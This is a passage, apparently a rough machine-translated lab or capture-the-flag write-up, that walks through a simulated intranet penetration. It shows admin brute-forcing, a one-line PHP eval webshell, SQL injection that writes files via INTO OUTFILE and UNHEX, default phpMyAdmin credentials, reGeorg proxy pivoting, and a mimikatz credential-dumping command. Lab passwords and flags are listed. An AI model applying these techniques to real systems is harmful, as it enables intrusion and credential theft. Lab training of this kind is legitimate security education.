【Experiment description】
The task of this experiment is to penetrate the host of the intranet through the proxy through the host of the external network. During the penetration process, it is generally necessary to first scan the port to guess the services running on the host, and then further determine the existence of the vulnerability through vulnerability scripts and other scanning tools, so as to complete the host penetration and obtain permissions.
The task of this experiment is to penetrate the host of the intranet through the proxy through the host of the external network. During the penetration process, it is generally necessary to first scan the port to guess the services running on the host, and then further determine the existence of the vulnerability through vulnerability scripts and other scanning tools, so as to complete the host penetration and obtain permissions.
In this experiment, you need to find a string with the word flag{32-bit MD5} as a credential for completing the task, and put the flag into the form to submit it.
通过网站或系统漏洞获取目标机器的权限通过获取服务器的权限后,通过此机器为跳板入侵内网
【Purpose of experiment】
xxxxxxxxxx爆破web网站后台,进入后台上传webshell通过sql注入漏洞获取webshell通过phpmyadmin写webshell通过代理扫描内网通过数据库中获取的密码登录内网机器抓取域控账号和密码登录域控
【Experimental Environment】
| Operating System | IP Address | Server Role | Login Account Password |
|---|---|---|---|
| Windows7 | 192.168.1.200 | Operating machine | Username: administrator; Password: Simplexue123 |
| centos 7 | 192.168.1.10 | Target machine | Username: root; Password: Simplexue123 |
| Windows2012 | 192.168.2.10 | Target machine | Username: administrator; Password: Simplexue123 |
| Windows2012 | 192.168.2.11 | Target machine | Username: administrator; Password: Simplexue123 |
Task 1 Backend file upload
First, use the nmap tool to scan the target IP provided by the experimental platform, check open familiar ports, and look for web services.
192.168.1.10
192.168.2.10
192.168.2.11
From the scan results, we find the target machine192.168.1.10(centos7) The HTTP service is opened on port 80 in the machine, and use the browser to view the web page
Confirm that the web page does exist. Next, use wwwscan to scan the website directory and discover the background path./manager/login.phpand/member/login.php。
/manager/login.php
/member/login.php
Using Burp Suite pair/manager/login.phpPerform blasting. Configure the proxy of Burp Suite and start the interception function to send POST requests to the Intruder tool for blasting.
When the username and password are not determined, the Cluster Bomb mode is used for blasting. Combine common user names (such as admin, administrator, root, etc.) with common passwords (selected from the commonly used password files that come with the platform).
In the picture aboveuseridLoading admin, administrator, root (including initial case variants),pwdCommonly used 1000 password files included in the location loading platform system
At the end of the attack, sort by the returned length, analyze the returned results and determine the correct username and password combination based on the returned response length.
The login user cookie is set in the account name admin (case insensitive) password 1q2w3e4r situation, so it can be determined that this is the correct username and password combination. Now the proxy is closed successfully and enters the website management background, which can be seen from it.flag1{5d41402abc4b2a76b9719d911017c592}
Then, use the file manager in attachment management -> file upload to upload a sentence in the tool folder Trojan 'shell.php', note that the current directory here is/uploads
Try to use the kitchen knife tool to connect to the webshell, the connection is successful and the WebShell permission is obtained
Task 2 sql injection
By observing/sqlThe directory, found that this page shows the SQL statements that handle URL query parameters in the backend. The default return information is as follows
Try to modify the query parameters, try to limit the id value here, and try to use the previous login formuseridFields
It was found that the background may only be able to parse id query parameters, but this is enough for us to implement SQL injection
In the previous chapter, nmap has scanned the website to use mysql. In order to obtain basic information of the website database, you need to first determine how many columns this select statement returns.
useORDER BYThe clause detects the number of columns returned by the result and determines the database structure. . When an index exceeds the actual number of columns is written, the database will report an error like "Unknown column index", and gradually increase the number from 5 to try
It is found that when sorted in column 10, you can query normally
However, when sorting in column 11, the backend reports an error, and the total number of 10 columns in the dede_admin table is determined.
Now confirm the display position
It can be seen that the user ID should be in the first position of the table and the account number should be in the third position.
Now build the SQL statement to find the database user and database name currently used
Now use this vulnerability to upload webshell. From the previous chapter, we know that the 80 port service is Apache Httpd. When querying relevant information, we know that the configuration file is located in the path./etc/httpd/conf/httpd.conf
Refer to https://cloud.tencent.com/developer/article/1918345, you can inject it into mysql database.LOAD_FILE()Functions read file contents and obtain web server configuration file
searchDocumentRoot, confirm the path/var/www/htmlFolders are the root directory of the website
Now you need to store a sentence Trojan in this directory, you can use mysqlINTO OUTFILEUpload a sentence Trojan to the root directory of the web server
You can see that a text file was successfully uploaded to the website root directory. Now replace the content with the most commonly used Trojan horse and upload it to the website root directory.webshell.phpdocument.
xxxxxxxxxx <?php @eval($_POST['cmd']); ?>Discover the returned SQL statement<Escaped but>The symbols are not transferred, so the problem of encoding and decoding is excluded.
Try putting it in the query parameters again<, found that the corresponding body should have been<Replaced with'(single quotation mark in HTML code), guess all in the backend processing logic<Replaced.
However, mysql supports writing using hexadecimal literal blobs,
Convert a sentence Trojan into hexadecimal ascii encoding and then pass the functionUNHEX()Write, so as to avoid the countermeasures in the back-end business before executing the "sql statement written to the database"<Filter of
Now you can try to connect through the kitchen knife and get the flagflag3{fd5d4d5a199e9e8bfadead5f5e52895a}
Task 3 phpmyadmin write shell
In Task 1, the path of PHPMyAdmin was successfully discovered through wwwscan scan.
Test PhpMyAdmin default username and password root/root, and found that the direct login was successful
Can be used in this pageSQLStatements are executed online to obtain various information, for example
SELECT load_file("/etc/httpd/conf/httpd.conf");
Query the location of the root directory of the website DocumentRoot,/var/www/html
Directly use PHPMyAdmin's SQL execution function to pass a sentence TrojanINTO OUTFILEUpload to the web root directory,
Successfully obtained shell permissions and at the same time in the website databasededecmsv57utf8sp1Search in the search indicatesflagCan be foundflag2{912ec803b2ce49e4a541068d495ab570}
Task 4. Scan the PC and log in
In the web port scan foldersocks.pyandRASscan.pyTwo files, of whichsocks.pyAs a tool function,RASscan.pyScan the script main portal for intranet
implementpython RASscan.py 192.168.2.1 192.168.2.255 -t 16Scan the intranet segment 192.168.2.0/24. This process is unexpectedly slow. Pay attention to interacting with the desktop regularly during the experiment to prevent the system from recycling virtual machine resources.
Found some192.168.2.10and192.168.2.11The two machines have port 3389 open and can log in remotely, but these two intranet addresses are located under the same intranet as the web server and cannot be directly accessed through the user machine. Therefore, the proxy service needs to be enabled on the server.
Refer to the experimental platform tips, upload the regeorg tool to the web machine to enable proxy services
Use the proxifier tool on the client to proxy remote connection access 2.11 (2.11 means ip192.168.2.11) After configuring the proxy, use rdp to connect to the desktop
I found that I needed a password to log in, and I thought of looking for a password in the server's file or database. Before that, I added direct rules for firefox.exe in the proxifier.
After exporting the database, searching for the administrator field, and discovering a suspected passwordtopsec.123
Try two scanned machines in turn, and find192.168.2.11You can use this password to log in on the machine, and find the flag in the c disk,flag4{238fb735876083b832229d279b995062}
Task 5: Crawl the domain control password and log in to the domain control
The experimental task requires the machine logged in to a remote desktop using mimikatz.192.168.2.11Crawl password
Connecting to via RDP successfully192.168.2.11After that, select the C disk of the shared user machine on rdp to upload the user machine's tools to the attacked desktop machine, upload the Mimikatz tool and execute itsekurlsa::logonpasswordsCommand to grab plaintext passwordSimplexue123。
Reference heremimikatz抓取明文密码 | ssooking's notebookCrawl password
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full"
Use this password to log in to other intranet hosts192.168.2.10, successfully obtained flagflag5{6aa16f9b07f2d00b16b94aa797488b38}
Final
Through the above steps, this experiment gradually completed the penetration test of the target host, successfully obtained multiple flags, and verified different types of vulnerabilities and attack methods.
0 评论:
发表评论